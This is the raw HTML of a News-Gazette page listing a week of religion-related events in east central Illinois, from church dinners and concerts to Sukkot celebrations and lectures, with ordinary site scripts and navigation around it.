<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <!-- Optimized mobile viewport -->
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Place favicon.ico and apple-touch-icon.png in root directory -->
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<link rel="shortcut icon" href="http://www.news-gazette.com/sites/all/files/favicon.ico" type="image/x-icon" />
<meta name="keywords" content="Champaign,Urbana,Danville,Paxton,Rantoul,Mahomet,Monticello,Tuscola,East Central Illinois,University of Illinois at Urbana-Champaign,News" />
<meta name="copyright" content="Copyright (c) 2015 The News-Gazette, Inc." />
<meta name="description" content="To submit items for this calendar, visit news-gazette.com/living and click &quot;Add an event&quot; under the miniature calendar on the page. You must be logged in, then fill in the appropriate fields and submit. Deadline is noon Tuesday before Friday publication.Events" />
    <title>Religion calendar, Oct. 14-20, 2016 | News-Gazette.com</title>
    <link type="text/css" rel="stylesheet" media="all" href="http://static.news-gazette.com/sites/all/modules/custom/custom_node/custom_node.css?c" />
<link type="text/css" rel="stylesheet" media="all" href="http://static.news-gazette.com/sites/all/modules/custom/news/news.css?c" />
<link type="text/css" rel="stylesheet" media="all" href="http://static.news-gazette.com/sites/all/files/css/css_36deb58ffd693f3de043f7520a356d72.css" />
<link type="text/css" rel="stylesheet" media="print" href="http://static.news-gazette.com/sites/all/files/css/css_22b2299bd170493de89ee05e2280371a.css" />
<!--[if lte IE 7]>
        <link type="text/css" rel="stylesheet" href="/sites/all/modules/custom/ng_weather/css/weather_ie7.css" media="all" />
      <![endif]-->    <script type="text/javascript" src="http://static.news-gazette.com/sites/all/files/js/js_c6e3e985cee8ca12ca1b6b49ff76627f.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, {"basePath":"\/","googleanalytics":{"trackOutgoing":1,"trackMailto":1,"trackDownload":1,"trackDownloadExtensions":"7z|aac|arc|arj|asf|asx|avi|bin|csv|doc|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls|xml|z|zip"},"uc_ajax_cart":{"CALLBACK":"\/uc_ajax_cart\/add\/item","SHOW_CALLBACK":"\/uc_ajax_cart\/show","CART_LINK_CALLBACK":"\/uc_ajax_cart\/addlink","BLOCK_UI":2,"TIMEOUT":2500,"UPDATE_CALLBACK":"\/uc_ajax_cart\/update","UPDATE":0,"CART_VIEW_ON":0,"SHOW_VIEW_CALLBACK":"\/uc_ajax_cart\/show-cart-view","TRACK_CLOSED_STATE":0,"INITIAL_CLOSED_STATE":0,"CART_PANE_EFFECT":0,"CART_PANE_EFFECT_DURATION":200,"HIDE_CART_OPERATIONS":false,"COLLAPSIBLE_CART":0,"CART_OPERATION":"Cart","ADD_TITLE":"Please wait","ADD_MESSAGES":["Adding product to cart..."],"REMOVE_TITLE":"Please wait","REMOVE_MESSAGES":["Removing product from cart..."],"UPDATE_TITLE":"Please wait","UPDATE_MESSAGES":["Updating cart..."]},"pc_meter":{"params":{"cn":"_pcmcn","hn":"subscriptions.news-gazette.com","ep":"\/visit","debug":0,"count_only":1,"ur":"\/living\/2016-10-14\/religion-calendar-oct-14-20-2016.html","force":null,"ni":"1482813","ct":"story","ap":"0","cr":"1476446400","ch":"1476446415","sl":7557,"sec_t":"Living","top_t":"Music|Religion|Social Services","po":0}},"ws_fl":{"width":92,"height":"21"},"ws_gpo":{"type":"medium","counter":true},"jPlayer":{"swfPath":"\/sites\/all\/libraries\/jplayer","autoPlay":0}});
//--><!]]>
</script>
    <script src="/sites/all/themes/custom/ng_fbg/js/jwp/jwplayer.js"></script>
    <script src="/sites/all/themes/custom/ng_fbg/js/jwp/ng-jwp.js"></script>
    <!--[if lt IE 7]>
    <link type="text/css" rel="stylesheet" media="all" href="/sites/all/themes/custom/ng_fbg/fix-ie.css" />            <![endif]-->
        <meta property="og:title" content="Religion calendar, Oct. 14-20, 2016" />
    <meta property="og:type" content="article" />
    <meta property="og:url" content="http://www.news-gazette.com/living/2016-10-14/religion-calendar-oct-14-20-2016.html" />
    <meta property="og:image" content="http://news-gazette.com/sites/all/themes/custom/ng_fbg/images/social.jpg" />
    <meta property="og:description" content="To submit items for this calendar, visit news-gazette.com/living and click "Add an event" under the miniature calendar on the page."/>
</head>

<body>

<!--Begin google consumer surveys -->
    <script type="text/javascript">
        (function() {
            var ARTICLE_URL = window.location.href;
            var CONTENT_ID = 'everything';
            document.write(
                '<scr'+'ipt '+
                'src="//survey.g.doubleclick.net/survey?site=_5mvdtzorx4zyw'+
                '&amp;url='+encodeURIComponent(ARTICLE_URL)+
                (CONTENT_ID ? '&amp;cid='+encodeURIComponent(CONTENT_ID) : '')+
                '&amp;random='+(new Date).getTime()+
                '" type="text/javascript">'+'\x3C/scr'+'ipt>');
        })();
    </script>
<!-- end google consumer surveys -->

<!-- Page Header -->
		<div id="screenshift"></div>
	<script type="text/javascript">
		if (($.cookie('_pcmss')==null) || $.cookie('_pcmss').substring(0,1)==0)
		{
			runUndertone();
		}
	</script>
<div id="lbAds">
<!--    isset($node) && $node->type == 'story'-->

<!--    -->
<!--    -->
<!--    LB positions -->
            <div id="runOfSite"></div>
    
    <div id="mobileLB"></div>
<!--    strpos('sports/illini-sports/mens-basketball')-->

</div>

<div id="loginContainer"></div>
<div id="displayOverlay"></div>
<div class="header">

	<div class="container topstuff"> <!-- above menu -->

		<div class="nglogo-front"> <a href="/"><img src="/sites/all/themes/custom/ng_fbg/images/news-gazette-full.png" width="260px" /></a> </div>
		<div class="nglogo-back hidden"> <a href="/"><img src="/sites/all/themes/custom/ng_fbg/images/news-gazette-rev-full.png" width="270px" /></a> </div>
		<div class="nglogo-back-small hidden"> <a href="/"><img src="/sites/all/themes/custom/ng_fbg/images/ng-rev-small.png" width="60px" /></a> </div>
		<div class="toplinks">
			<a href="https://subscriptions.news-gazette.com/"><i class="fa fa-newspaper-o" aria-hidden="true"></i> Subscribe</a>

			<a title="login options" data-toggle="modal" href="#myModal"><i class="fa fa-user" aria-hidden="true"></i> Log In</a>
			<a href="#" title="search" onclick="showSearch();"><i class="fa fa-search" aria-hidden="true"></i> Search</a>
			<a href="javascript:void(window.open('http://player.listenlive.co/47651','_blank','width=850,height=600,left=100,top=100,location=no,menubar=no,status=no,toolbar=no,scrollbars=no,resizable=no'));"><i class="fa fa-headphones" aria-hidden="true"></i> Listen Now</a>
		</div><!-- end toplinks -->
		<div class="wdwslogo-front hidden"> <a href="/wdws"><img src="/sites/all/themes/custom/ng_fbg/images/wdws-wide-full.png" width="260px" /></a> </div>
		<div class="wdwslogo-back"> <a href="/wdws"><img src="/sites/all/themes/custom/ng_fbg/images/wdws-wide-rev-full.png" width="260px" /></a> </div>
		<div class="wdwslogo-back-small"> <a href="/wdws"><img src="/sites/all/themes/custom/ng_fbg/images/wdws-rev-small.png" width="75px" /></a> </div>
	</div>
	<div class="navstripe">
    <div class="container">
        <p class="datebox ngdatebox">Friday, October 14, 2016 <a href="/weather"><strong><span id="current-temp-replace">83</span></strong></a>
        <a href="http://eedition.news-gazette.com">Today's Paper</a></p>
        <div id="weather-info" class="hidden"><div id="block-ng_weather-weather" class="clear-block block block-ng_weather ">


  <div class="content"><div id="weather-container">
      <a href="/weather">

      <div class="row day">
        <div class="location-forecast small current forecast-img cl wccl ">
        </div>
        <div class="weather-info">
          <h2 class="location">Weather</h2>
          <div class="current-temp">
            54<span class="degrees">&deg;F</span>
          </div>
          <div class="forecast">Sunny</div>
        </div> 
      </div>
    </a>
  </div>
</div>
</div>
</div>
        <p class="datebox wdwsdatebox hidden"><span class="wdws-date">Friday, October 14, 2016  &#160;&#160;</span><a href="">Today's Schedule</a> &#160;&#160;<a href="">Listen Now!</a></p>

        <nav id="anchored" class="navbar navbar-default newsnav" role="navigation">
            <!-- Brand and toggle get grouped for better mobile display -->
            <div class="navbar-header">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
            </div>
            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse navbar-ex1-collapse">
                <ul class="nav navbar-nav stretch">
                    <li class="dropdown"><a title="News" href="/news" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">News <b class="caret"></b></a>
                        <ul role="menu" class="dropdown-menu">
                            <li><a title="Local News" href="/news/local">Local</a></li>
                            <li><a title="State News" href="/news/state">State</a></li>
                            <li><a title="National and World News" href="/news/nationworld">Nation - World</a></li>
                            <li><a title="Business News" href="/news/business">Business</a></li>
                            <li><a title="Obituaries" href="/obituaries">Obituaries</a></li>
                            <li><a title="Weather" href="/news/weather">Weather</a></li>
                        </ul>
                    </li>
                    <li class="dropdown"><a title="Sports" href="/sports" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Sports <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Prep Sports" href="/sports/prep-sports">Prep Sports</a></li>
                            <li><a title="Illini Sports" href="/sports/illini-sports">Illini Sports</a></li>
                            <li><a title="All Sports" href="/sports">All Sports</a></li>
                            <li><a title="Illini Forums" href="http://forums.illinihq.com">Illini Forums</a></li>
                        </ul>
                    </li>
                    <li><a title="Business" href="/news/business">Business</a></li>
                    <li><a title="Living" href="/living">Living</a></li>
                    <li><a title="Arts and Entertainment" href="/arts-entertainment">A&E</a></li>
                    <li><a title="Blogs" href="/blogs">Blogs</a></li>
                    <li class="dropdown"><a title="Opinion" href="/opinion" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Opinion <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Editorials" href="/opinion/editorials">Editorials</a></li>
                            <li><a title="Letters to the Editor" href="/opinion/letters-editor">Letters</a></li>
                            <li><a title="Columns" href="/opinion/columns">Columns</a></li>
                            <li><a title="Guest Commentary" href="/opinion/guest-commentary">Guest Commentary</a></li>
                            <li><a title="All Opinions" href="/opinion/">All Opinions</a></li>
                        </ul>
                    </li>
                    <li class="dropdown"><a title="Multimedia" href="/multimedia" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Multimedia <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Photo Galleries" href="/multimedia/photogallery">Photo Galleries</a></li>
                            <li><a title="Podcasts" href="/multimedia/podcast">Podcasts</a></li>
                            <li><a title="Videos" href="/video">Videos</a></li>
                        </ul>
                    </li>
                    <li class="dropdown secondary-menu-item"><a title="Classified" href="/classified" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Classified <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Classified Jobs" href="https://classadz.vdata.com/Champaign/Advertising/AdvertiserType.aspx">Place an Ad</a></li>
                            <li><a title="News-Gazette Classifieds" href="/classified">Classified Listings</a></li>
                            <li><a title="Garage Sales" href="/classified/garage-sales">Garage Sales</a></li>
                            <li><a title="Classified Jobs" href="http://careers.news-gazette.com">Jobs</a></li>
                        </ul>
                    </li>
                    <li class="secondary-menu-item"><a title="Store" href="http://news-gazette.jobs">Jobs</a></li>
                    <li class="secondary-menu-item"><a title="Store" href="/store/deal-day">Shop</a></li>
                    <li class="secondary-menu-item"><a title="Weekly Ads" href="/circulars">Weekly Ads</a></li>
                </ul>
            </div>
        </nav>
    </div> <!-- end container with navigation -->
</div> <!-- end navstripe -->

</div> <!-- end header -->

<div class="secondary-header">
    <div class="container">
        <div class="secondary-menu">
            <ul class="nav navbar-nav stretch secondary-nav">
                <li class="dropdown"><a title="Classified" href="/classified" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Classified <span class="caret"></span></a>
                    <ul role="menu" class=" dropdown-menu">
                        <li><a title="Classified Jobs" href="https://classadz.vdata.com/Champaign/Advertising/AdvertiserType.aspx">Place an Ad</a></li>
                        <li><a title="News-Gazette Classifieds" href="/classified">Classified Listings</a></li>
                        <li><a title="Garage Sales" href="/classified/garage-sales">Garage Sales</a></li>
                        <li><a title="Classified Jobs" href="http://careers.news-gazette.com">Jobs</a></li>
                    </ul>
                </li>
                <li><a title="NewsGazette.jobs" href="http://news-gazette.jobs">Jobs</a></li>
                <li><a title="Store" href="/store/deal-day">Shop</a></li>
                <li><a title="Weekly Ads" href="/circulars">Weekly Ads</a></li>
            </ul>
        </div> <!-- end secondary menu -->

        
        <div class="trending-news-background">
        </div> <!-- end breaking-news-background trending-news-background -->

    </div> <!-- end container -->
    <div class="right-of-secondary-menu"></div>
</div> <!-- end secondary-header -->
<div id="nodeType" data-type="story"></div>

<div class="navbar-inverse"></div>
<div id="adLib" class="remove">
    <div class="container">
        <div class="col-md-12 scrollTab">

            <a href="/"><img class="scrollLogo " src="/sites/all/themes/custom/ng_fbg/images/ng_small.png"></a><a href="/wdws"><img class="scrollLogo " src="/sites/all/themes/custom/ng_fbg/images/wdws_small.png"></a>
                            <span class="scrollTitle">Religion calendar, Oct. 14-20, 2016   <span id="share" class="glyphicon glyphicon-share" onclick="shareIt()"><span class="share-txt">share</span></span></span>
                <div class="scrollSocial" style="display:none;">
                    <a title="Facebook share button" class="facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.news-gazette.com/living/2016-10-14/religion-calendar-oct-14-20-2016.html" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank">Facebook</a>
                    <a title="Twitter share button" class="twitter" href="https://twitter.com/share?url=http://www.news-gazette.com/living/2016-10-14/religion-calendar-oct-14-20-2016.html&amp;text=Religion calendar, Oct. 14-20, 2016" onclick="return !window.open(this.href, 'Twitter', 'width=640,height=200')" target="_blank">Twitter</a>
                </div>
                        <div class="scrollLogin pull-right">
                <span class="wdwsCurrent"><a title="weather" href="/weather"><span class="glyphicon glyphicon-cloud icon-bar"></span></a><span title="search" class="glyphicon glyphicon-search icon-bar" onclick="showSearchScroll();"></span> <a title="login options" data-toggle="modal" href="#myModal"><span class="glyphicon glyphicon-user icon-bar"></span></a> | <a title="subscribe to the news-gazette" href="http://members.news-gazette.com">Subscribe</a></span>
            </div>
        </div>
        <progress value="0"></progress>

        <div id="menuAnchor"></div>
    </div>

    
        <div id="addRelated">
            <div class="container">
                <div class="col-md-12">
                    <h2>More Living</h2>
                    <ul id="scrollList">
                                                    <li>
                                                                <a href="/living/2016-10-14/religion-calendar-oct-14-20-2016.html">Religion calendar, Oct. 14-20, 2016</a>                            </li>
                                                    <li>
                                                                <a href="/living/2016-10-13/rich-warren-now-its-googles-turn-smartphone-release.html">Rich Warren: Now it&#039;s Google&#039;s turn for smartphone release</a>                            </li>
                                                    <li>
                                                                <a href="/living/2016-10-12/joan-griffisillinois-ancestors-new-guide-genealogy-resources-springfield.html">Joan Griffis/Illinois Ancestors: New guide to genealogy resources in Springfield</a>                            </li>
                                                    <li>
                                                                    <a href="/living/2016-10-12/neighbors-recognizing-accomplishments-throughout-our-communities.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/100x100_scale/images/2016/10/11/20161012-034104-pic-536297966.jpg" alt="Neighbors: Recognizing accomplishments throughout our communities " title="Neighbors: Recognizing accomplishments throughout our communities "  class="imagecache imagecache-100x100_scale" width="100" height="60" /></a>                                                                <a href="/living/2016-10-12/neighbors-recognizing-accomplishments-throughout-our-communities.html">Neighbors: Recognizing accomplishments throughout our communities </a>                            </li>
                                            </ul>
                </div></div>
        </div>

    

</div>

<div class="container col-md-12">
    <!-- Modal -->
    <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
                    <h4 class="modal-title">Login Options</h4>
                </div>
                <div class="modal-body">
                        <div id="commenting" class="col-md-6 commentingLogin">
                            <h2>Commenting</h2>
                            <p>Login to comment or to shop for deal of the day or books.</p>
                        </div>
                        <div id="member" class="col-md-6 memberLogin">
                            <h2>Member Login</h2>
                            <p><a href="#">Login</a> to your member account to read premium articles.</p>
                        </div>

                    <div id="loginHid" style="display:none;">
                        <form action="/living/2016-10-14/religion-calendar-oct-14-20-2016.html?destination=node%2F1482813"  accept-charset="UTF-8" method="post" id="user-login-form">
<div><div class="form-item" id="edit-name-wrapper">
 <label for="edit-name">Username or e-mail: <span class="form-required" title="This field is required.">*</span></label>
 <input type="text" maxlength="60" name="name" id="edit-name" size="15" value="" class="form-text required" />
</div>
<div class="form-item" id="edit-pass-wrapper">
 <label for="edit-pass">Password: <span class="form-required" title="This field is required.">*</span></label>
 <input type="password" name="pass" id="edit-pass"  maxlength="60"  size="15"  class="form-text required" />
</div>
<input type="submit" name="op" id="edit-submit-1" value="Log in"  class="form-submit" />
<div class="item-list"><ul><li class="first"><a href="/user/register" title="Create a new user account.">Create new account</a></li>
<li class="last"><a href="/user/password" title="Request new password via e-mail.">Request new password</a></li>
</ul></div><input type="hidden" name="form_build_id" id="form-42d5b627f55da79bd060e4f9bb52ae2f" value="form-42d5b627f55da79bd060e4f9bb52ae2f"  />
<input type="hidden" name="form_id" id="edit-user-login-block" value="user_login_block"  />

</div></form>
                    </div>
                </div>
                <div class="modal-footer">
                    <div id="btn-anchor"></div><button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
                </div>
            </div><!-- /.modal-content -->
        </div><!-- /.modal-dialog -->
    </div><!-- /.modal -->



</div>

<div class="container">

<div id="searchSolar" class="col-md-12" style="display:none;">
    <div class="control-group">
        <form id="searchIt" action="/search/apachesolr_search/">
            <input type="text" placeholder="Search articles, videos, obituaries" id="search" class="searchLong input-large">
            <input type="submit" value="Search" id="searchNow" class="btn btn-success" alt="Click to search" title="Click to Search">
        </form>
    </div>
</div>  <section id="section-content" class="section section-content col-md-12">
	<div id="page">
      <div id="main">
	    		  <div id="content" class="col-md-8">
			
		    <div id="breadcrumb"><div class="breadcrumb"><a href="/">Home</a> » <a href="/living">Living</a></div></div>				              <!--<span class="glyphicon glyphicon-bookmark markit" onclick="bookmark()"></span> -->
			<h1 class="title" id="page-title">Religion calendar, Oct. 14-20, 2016</h1>                                     
            <div id="content-content" class="clear-block">
                <div class="col-md-12">
              
    <div id="node-1482813" class="node">
        <form id="bookmark">
            <input name="nid" type="hidden" value="1482813">
            <input name="title" type="hidden" value="Religion+calendar%2C+Oct.+14-20%2C+2016">
        </form>

        
        
        <span class="submitted"><div class="submitted"><span class="timestamp">Fri, 10/14/2016 - 7:00am</span> | <span class="authors"><a href="/author/news-gazette">The News-Gazette</a></span></div></span>

    <div class="p402_premium"><!-- Begin GCS -->
            <div class="content">
                                                            <div class="p402_hide"><!-- Begin hide forGCS -->
                            <div id="social-media-widgets">
                                <div class="social-share">
        <a class="share-btn" href="https://www.facebook.com/sharer/sharer.php?u=http://www.news-gazette.com/living/2016-10-14/religion-calendar-oct-14-20-2016.html" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-facebook.png"></a>
    <a class="share-btn" href="https://twitter.com/share?url=http://www.news-gazette.com/living/2016-10-14/religion-calendar-oct-14-20-2016.html&amp;text=Religion calendar, Oct. 14-20, 2016" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-twitter.png"></a>
    <a href="javascript:window.print()"><img src="/sites/all/themes/custom/ng_fbg/images/print.png"></a>
    <a class="share-btn" href="/printmail/1482813"><img src="/sites/all/themes/custom/ng_fbg/images/send4.png"></a>
</div><!--                                -->                            </div>
                        </div>
                                    <p><em>To submit items for this calendar, visit news-gazette.com/living and click "Add an event" under the miniature calendar on the page. You must be logged in, then fill in the appropriate fields and submit. Deadline is noon Tuesday before Friday publication.</em></p>
<p><strong>Events</strong></p>
<p>125th anniversary celebration. 2 to 4 p.m. Sunday, Wesley Chapel Church, Timber Road, about 21/2 miles southwest of Newman. The church is hosting an open house with an ice cream and pie social to celebrate its founding. The informal gathering will include congregational singing and short addresses by local clergy. Attendees are free to come and go as they please. Visitors are welcome to wander about the grounds and to visit the adjoining Albin Cemetery, which has a number of Civil War veterans' graves. Free. For information, call 246-8228.</p>
<p>St. Elizabeth rosary rally. Noon to 1 p.m. Saturday, St. Elizabeth of Hungary Catholic Church, 100 S. Church St., Thomasboro. This will be one of more than 15,000 public square rosary rallies across the United States on this day. Call 840-6749 for more information.</p>
<p>Sukkot dinner, service and celebration. 5:30 p.m. Sunday, Sinai Temple, 3104 W. Windsor Road, C. Dinner, a brief festival service, and festive Sukkot melodies by the Shabbat Singers. Parve and/or vegetarian entree will be provided. A dish to share for 12 people, appropriate to the harvest season, is requested. Suggested donation, $5 per person or $15 per family; $10 or $25 if you do not bring a dish. To register or for information, call 352-8140 or email <a href="mailto:assistant@sinaitemplecu.org">assistant@sinaitemplecu.org</a>.</p>
<p>St. Matthew Catholic School Fall Open House. 5 to 7 p.m. Tuesday, 1307 Lincolnshire Drive, C. School tours, principal and teachers present, parent ambassadors in attendance, tuition assistance information and after-school care information. Free admission and popcorn. For details, call 359-4114.</p>
<p>Sukkah Fest. 5 p.m. Thursday, Illini Chabad, Chabad Center for Jewish Life, 509 S. Fourth St., C. Featuring Milt's BBQ for the Perplexed food truck, music, activities for the kids, fun for the adults. Order online to receive a discount on all food items, jewish/Mega-JewishFest. For information, call 355-8672 or email <a href="mailto:rabbi@illinois.edu">rabbi@illinois.edu</a>.</p>
<p>Mount Olive Missionary Baptist Church 100th anniversary banquet. 6 p.m. Oct. 21, Hawthorn Suites, 101 Trade Center Drive, C. Open to the public. Tickets, $35, at the door, or in advance at the church, 808 E. Bradley Ave., C. For information, call 352-7713.</p>
<p>Halloween reading night. 5 to 7 p.m. Oct. 21, First Presbyterian Church, 100 N. Franklin St., Danville. Bring the family out for a few good stories and some Halloween treats.</p>
<p>Fall Fun Fest. 1 to 4 p.m. Oct. 22, Trinity Lutheran Church, 701 E. Florida Ave., U. Face painting, inflatables, pumpkin decorating. Call 367-8923 for information.</p>
<p><strong>Food, fundraisers</strong></p>
<p>Chicken noodle dinner. 4 to 7 p.m. Saturday, St. Peter's United Church of Christ, 905 S. Russell St., C. Cost: Adults $10, children 5-12 $5, children under 5 years old free, veterans (with valid military ID) free. Carryouts available. Call 356-3635 to reserve a ticket.</p>
<p>Annual chili and vegetable soup supper. 4 to 7 p.m. Saturday, Union Corner United Methodist Church, 14158 Perrysville Road, Danville. Freewill offering. Call 497-5764 or 442-5759.</p>
<p>'Soup and a Movie' fundraiser. 6:30 to 10 p.m. Saturday, Bement United Methodist Church, basement, 249 N. Piatt St., Bement. Serving begins at 6:30 p.m. and the movie, "The Blind Side," at 7:15 p.m. Any donations accepted. Call 678-8311 or 637-6040.</p>
<p>Pumpkin Patch. 11 a.m. to 7 p.m. Monday through Oct. 31, Trinity Lutheran Church, 701 E. Florida Ave., U. A portion of each purchase goes to help local mission projects. Call 367-8923 for information.</p>
<p>Artisan Market. 5:30 to 7:30 p.m. Oct. 21, 9 a.m. to 1 p.m. Oct. 22, Faith United Methodist Church, 1719 S. Prospect Ave., C. Artisan handcrafted fair trade and local entrepreneurs, bakers, pre-owned books, lunch counter and more. Sneak peek event, Oct. 21, $5 admission. Free admission all day Oct. 22, with lunch served, 11 a.m. to 1 p.m. See champaignfaith.org.</p>
<p>Urbana Theological Seminary's library booksale. 8 a.m. to 3 p.m. Oct. 22, University Baptist Church, 314 E. Daniel St., C. Sale includes commentaries, Bible study books, pastoral helps, reference materials, Christian living titles and more. Hardbacks, $1; paperbacks, 50 cents. Also, unopened boxes of Christmas cards, and several plants for sale. Call 365-9005 or urbanaseminary.org/about/news/.</p>
<p><strong>Music</strong></p>
<p>Concert for Daily Bread. 7 p.m. today, Faith United Methodist Church, Worship and Life Center, 1719 S. Prospect Ave., C. Doors open, 6:30 p.m. Phil Keaggy and his band, and special guest Glenn Kaiser, a Chicago blues musician and community servant, will be in concert to benefit Champaign's Daily Bread Soup Kitchen. General admission tickets, $20, in advance; $25 at the door. Tickets at Champaignfaith.org or the church office.</p>
<p>John Michael Talbot. 7 p.m. Sunday and Monday, St. Patrick Church, 708 W. Main St., U. Two special evenings with the Christian music legend, best-selling author and TV host. Tickets are not required. Love offering received to support the ministries of John Michael Talbot and the Brothers and Sisters of Charity. Call 367-2665.</p>
<p><strong>Speakers/seminars</strong></p>
<p>Guest speaker Jack Jenkins. 10:30 a.m. Sunday, Apostolic Life Church, 2107 N. High Cross Road, U. Jenkins is director of the Illinois District Global Missions. For details, go to <a href="http://www.apostoliclife.org" target="_blank">http://www.apostoliclife.org</a>.</p>
<p>Lectures on Abrahamic religions. 7 to 8:30 p.m. Monday, Danville Public Library, 319 N. Vermilion St. Conclusion of the two-part lecture on "Abrahamic Religions and the Middle East: Then and Now" by John Flattery. Program looks at the "Muddle in the Middle East" and considers how the return of Russia and the entrance of Turkey have altered the political and military equation in the Middle East. Free and open to the public. For information, go to DanvillePublicLibrary.org.</p>
<p><strong>Workshops/classes</strong></p>
<p>'A Taste of Seminary: Contemporary Issues in Christian Perspective.' 7 to 8:30 p.m. Tuesday, Stratford Park Bible Chapel, 2801 W. Kirby Ave., C. "Does God ordain people to hell? Salvation, sovereignty and human freedom." One-hour lecture followed by time for questions. Open to anyone interested in engaging important questions about the meaning of life, faith and culture from a Christian perspective. No preparation or reading required. Coffee and snacks provided. Call 365-9005 or email <a href="mailto:mgreen@urbanaseminary.org">mgreen@urbanaseminary.org</a>.</p>
<p><strong>Miscellaneous</strong></p>
<p>Stitch-a-thon. 3 to 5 p.m. Sunday, Bible Education Center at Lincoln Square Mall, Urbana. The SNUGGLES volunteer organization provides knitted and crocheted squares to day care centers in South Africa, where they are assembled into blankets for the children. Bring needles and yarn or use materials donated. Donations of yarn or monetary contributions are accepted. Call 367-2100 for more information.</p>
<p>Champaign-Urbana Christian Women's Connection Luncheon. Noon Oct. 25, Hilton Garden Inn, 1501 S. Neil St., C. Speaker and feature:Glenda Smith of DeKalb, "Found an Everlasting Love." Feature: Make A New Friend. Music: Sharon Leikvoll. Affiliated with Stonecroft Ministries. Tickets $16 at the door. Call 621-4245 or 367-3671.</p>
<div class="clear"></div>                <div class="clear"></div>
            </div>
        </div><!-- End GCS -->
        <!-- Begin conditional GCS script execution -->
                    <script type="text/javascript">
                if (($.cookie('_pcmss')==null) || $.cookie('_pcmss').substring(0,1)==0) {
                    try { _402_Show(); } catch(e) {}
                }
            </script>        <!--  End conditional GCS script execution-->
                    <div id="h-social">
                <div class="social-share">
        <a class="share-btn" href="https://www.facebook.com/sharer/sharer.php?u=http://www.news-gazette.com/living/2016-10-14/religion-calendar-oct-14-20-2016.html" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-facebook.png"></a>
    <a class="share-btn" href="https://twitter.com/share?url=http://www.news-gazette.com/living/2016-10-14/religion-calendar-oct-14-20-2016.html&amp;text=Religion calendar, Oct. 14-20, 2016" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-twitter.png"></a>
    <a href="javascript:window.print()"><img src="/sites/all/themes/custom/ng_fbg/images/print.png"></a>
    <a class="share-btn" href="/printmail/1482813"><img src="/sites/all/themes/custom/ng_fbg/images/send4.png"></a>
</div>            </div>
                <div class="meta">
                            <div id="vocab-1482813-27-wrapper" class="vocab-wrapper"><span class="vocab-label">Sections (1):</span><span class="vocab-terms"><a href="/living">Living</a></span></div><div id="vocab-1482813-28-wrapper" class="vocab-wrapper"><span class="vocab-label">Topics (3):</span><span class="vocab-terms"><a href="/topics/music">Music</a>, <a href="/topics/religion">Religion</a>, <a href="/topics/social-services">Social Services</a></span></div>                    </div>

            
                <div id="showRelated">
                    <h2>More Living</h2>
                    <a class="btn-dismiss" onclick="dismissShowRelated()" class="btn btn-default btn-next"><span class="glyphicon glyphicon-remove-sign"></span></a>
                    <ul id="showScrollList">
                                                    <li style="display:none;">
                                                                <a href="/living/2016-10-14/religion-calendar-oct-14-20-2016.html">Religion calendar, Oct. 14-20, 2016</a>                            </li>
                                                    <li style="display:none;">
                                                                <a href="/living/2016-10-13/rich-warren-now-its-googles-turn-smartphone-release.html">Rich Warren: Now it&#039;s Google&#039;s turn for smartphone release</a>                            </li>
                                                    <li style="display:none;">
                                                                <a href="/living/2016-10-12/joan-griffisillinois-ancestors-new-guide-genealogy-resources-springfield.html">Joan Griffis/Illinois Ancestors: New guide to genealogy resources in Springfield</a>                            </li>
                                                    <li style="display:none;">
